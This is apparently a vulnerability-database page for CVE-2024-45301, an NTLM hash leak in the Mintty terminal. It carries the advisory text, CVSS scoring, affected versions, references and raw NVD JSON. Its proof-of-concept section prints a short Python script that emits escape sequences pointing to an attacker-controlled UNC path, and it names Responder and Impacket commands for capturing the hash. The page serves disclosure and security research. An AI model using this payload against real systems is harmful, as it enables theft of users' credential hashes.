CVE-2024-45301

Description

Mintty is a terminal emulator for Cygwin, MSYS, and WSL. In versions 2.3.6 through 3.7.4, several escape sequences can cause the mintty process to access a file in a specific path. It is triggered by simply printing them out on bash. An attacker can specify an arbitrary network path, negotiate an ntlm hash out of the victim's machine to an attacker controlled remote host. An attacker can use password cracking tools or NetNTLMv2 hashes to Pass the Hash. Version 3.7.5 fixes the issue.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Mintty >= 2.3.6 且 < 3.7.5

Mintty 2.3.6

Mintty 2.3.7

Mintty 2.3.8

Mintty 3.0.0 至 3.7.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2024-45301 PoC - Mintty NetNTLM Hash Leakage
# Trigger via escape sequence with malicious UNC path
# Attacker setup: Run Responder or Impacket smbserver on attacker machine
# PoC escape sequence to trigger SMB connection:

evil_escape_seq = "\x1b]8;;\\\\attacker\\share\a"
print(evil_escape_seq)

# Alternative PoC - More explicit file access escape sequence:
# This sequence causes mintty to attempt file access at attacker-controlled path
poc_seq2 = "\033]8;;file:///\\\\attacker\\evil\\path\007"
print(poc_seq2)

# Note: Replace '\\\\attacker\\share' with actual attacker SMB server IP/hostname
# On attacker side, use Responder:
# sudo python3 Responder.py -I eth0 -v

# Or use Impacket smbserver:
# impacket-smbserver -smb2support share ./exploit_dir

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2024-45301
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2024-45301
[3] CVE Details https://www.cvedetails.com/cve/CVE-2024-45301/
[4] VulDB https://vuldb.com/cve/CVE-2024-45301
[5] https://github.com/mintty/mintty/security/advisories/GHSA-jf4m-m6rv-p6c5

Raw JSON Data

JSON

{"cve": {"id": "CVE-2024-45301", "sourceIdentifier": "[email protected]", "published": "2025-11-12T19:15:34.663", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mintty is a terminal emulator for Cygwin, MSYS, and WSL. In versions 2.3.6 through 3.7.4, several escape sequences can cause the mintty process to access a file in a specific path. It is triggered by simply printing them out on bash. An attacker can specify an arbitrary network path, negotiate an ntlm hash out of the victim's machine to an attacker controlled remote host. An attacker can use password cracking tools or NetNTLMv2 hashes to Pass the Hash. Version 3.7.5 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "references": [{"url": "https://github.com/mintty/mintty/security/advisories/GHSA-jf4m-m6rv-p6c5", "source": "[email protected]"}]}}